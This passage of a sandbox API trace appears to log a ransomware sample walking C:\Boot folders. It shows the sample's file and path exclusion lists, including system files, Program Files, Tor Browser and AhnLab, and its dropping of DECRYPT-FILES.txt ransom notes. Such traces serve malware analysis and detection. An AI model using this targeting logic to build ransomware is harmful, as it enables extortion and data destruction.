(lpString="C:\\Boot\\ja-JP\\") returned 14 [0071.269] lstrcatW (in: lpString1="C:\\Boot\\ja-JP\\", lpString2="*" | out: lpString1="C:\\Boot\\ja-JP\\*") returned="C:\\Boot\\ja-JP\\*" [0071.269] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.269] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.269] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.269] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.269] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.269] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.269] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.269] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.269] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.269] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.270] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.270] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.270] lstrlenW (lpString="C:\\Boot\\ja-JP\\") returned 14 [0071.270] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.270] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\ja-JP\\" | out: lpString1="C:\\Boot\\ja-JP\\") returned="C:\\Boot\\ja-JP\\" [0071.270] lstrcatW (in: lpString1="C:\\Boot\\ja-JP\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned="C:\\Boot\\ja-JP\\bootmgr.exe.mui" [0071.270] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.270] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.270] CloseHandle (hObject=0x0) returned 0 [0071.270] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.270] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.270] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.270] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.270] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.270] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.270] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.270] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.270] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.271] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.271] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.271] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.271] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.271] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.271] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.271] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.271] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.271] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.271] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.271] lstrlenW (lpString="C:\\Boot\\ja-JP\\") returned 14 [0071.271] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.271] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\ja-JP\\" | out: lpString1="C:\\Boot\\ja-JP\\") returned="C:\\Boot\\ja-JP\\" [0071.271] lstrcatW (in: lpString1="C:\\Boot\\ja-JP\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\ja-JP\\jkbimi8.tmp") returned="C:\\Boot\\ja-JP\\jkbimi8.tmp" [0071.271] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.271] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\jkbimi8.tmp" (normalized: "c:\\boot\\ja-jp\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.271] CloseHandle (hObject=0x0) returned 0 [0071.271] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.272] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.272] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.272] CloseHandle (hObject=0x420) returned 1 [0071.272] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a06c80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a06c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a06c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.272] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.272] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.272] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.272] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.272] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.272] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.272] lstrlenW (lpString="C:\\Boot\\") returned 8 [0071.272] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.272] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0071.272] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\jkbimi8.tmp") returned="C:\\Boot\\jkbimi8.tmp" [0071.272] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.273] CreateFileW (lpFileName="C:\\Boot\\jkbimi8.tmp" (normalized: "c:\\boot\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.273] CloseHandle (hObject=0x0) returned 0 [0071.273] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.273] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0071.273] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0071.273] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0071.273] lstrcatW (in: lpString1="ko-KR", lpString2="\\" | out: lpString1="ko-KR\\") returned="ko-KR\\" [0071.273] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="ko-KR\\" | out: lpString1="C:\\Boot\\ko-KR\\") returned="C:\\Boot\\ko-KR\\" [0071.273] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Program Files") returned 0x0 [0071.273] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch=":\\Windows") returned 0x0 [0071.273] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Games\\") returned 0x0 [0071.273] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.273] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.274] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.274] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.274] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.274] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\All Users") returned 0x0 [0071.274] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.274] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.274] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.274] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="AhnLab") returned 0x0 [0071.274] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.274] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0071.274] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.274] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\ko-KR\\\\jkbimi8.tmp") returned 26 [0071.274] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\\\jkbimi8.tmp" (normalized: "c:\\boot\\ko-kr\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.275] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0071.275] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.275] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\ko-KR\\\\DECRYPT-FILES.txt") returned 32 [0071.275] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\ko-kr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.275] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.276] CloseHandle (hObject=0x424) returned 1 [0071.276] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0071.276] lstrcatW (in: lpString1="C:\\Boot\\ko-KR\\", lpString2="*" | out: lpString1="C:\\Boot\\ko-KR\\*") returned="C:\\Boot\\ko-KR\\*" [0071.276] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.277] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.277] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.277] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.277] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.277] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.277] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.277] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.277] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.277] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.277] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0071.277] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.277] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\ko-KR\\" | out: lpString1="C:\\Boot\\ko-KR\\") returned="C:\\Boot\\ko-KR\\" [0071.277] lstrcatW (in: lpString1="C:\\Boot\\ko-KR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned="C:\\Boot\\ko-KR\\bootmgr.exe.mui" [0071.277] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.278] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.278] CloseHandle (hObject=0x0) returned 0 [0071.278] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.278] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.278] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.278] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.278] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.278] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.278] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.278] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.278] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.278] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.278] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0071.278] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.278] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\ko-KR\\" | out: lpString1="C:\\Boot\\ko-KR\\") returned="C:\\Boot\\ko-KR\\" [0071.279] lstrcatW (in: lpString1="C:\\Boot\\ko-KR\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\ko-KR\\jkbimi8.tmp") returned="C:\\Boot\\ko-KR\\jkbimi8.tmp" [0071.279] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.279] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\jkbimi8.tmp" (normalized: "c:\\boot\\ko-kr\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.279] CloseHandle (hObject=0x0) returned 0 [0071.279] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.279] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.279] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.279] CloseHandle (hObject=0x420) returned 1 [0071.279] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0071.279] lstrcmpiW (lpString1="memtest.exe", lpString2="DECRYPT-FILES.txt") returned 1 [0071.279] lstrcmpiW (lpString1="memtest.exe", lpString2="autorun.inf") returned 1 [0071.279] lstrcmpiW (lpString1="memtest.exe", lpString2="boot.ini") returned 1 [0071.280] lstrcmpiW (lpString1="memtest.exe", lpString2="desktop.ini") returned 1 [0071.280] lstrcmpiW (lpString1="memtest.exe", lpString2="ntuser.dat") returned -1 [0071.280] lstrcmpiW (lpString1="memtest.exe", lpString2="iconcache.db") returned 1 [0071.280] lstrcmpiW (lpString1="memtest.exe", lpString2="bootsect.bak") returned 1 [0071.280] lstrcmpiW (lpString1="memtest.exe", lpString2="ntuser.dat.log") returned -1 [0071.280] lstrcmpiW (lpString1="memtest.exe", lpString2="thumbs.db") returned -1 [0071.280] lstrcmpiW (lpString1="memtest.exe", lpString2="Bootfont.bin") returned 1 [0071.280] lstrlenW (lpString="memtest.exe") returned 11 [0071.280] lstrcmpiW (lpString1="exe", lpString2="lnk") returned -1 [0071.280] lstrcmpiW (lpString1="exe", lpString2="exe") returned 0 [0071.280] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0071.280] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0071.280] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0071.280] lstrcatW (in: lpString1="nb-NO", lpString2="\\" | out: lpString1="nb-NO\\") returned="nb-NO\\" [0071.280] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="nb-NO\\" | out: lpString1="C:\\Boot\\nb-NO\\") returned="C:\\Boot\\nb-NO\\" [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Program Files") returned 0x0 [0071.280] 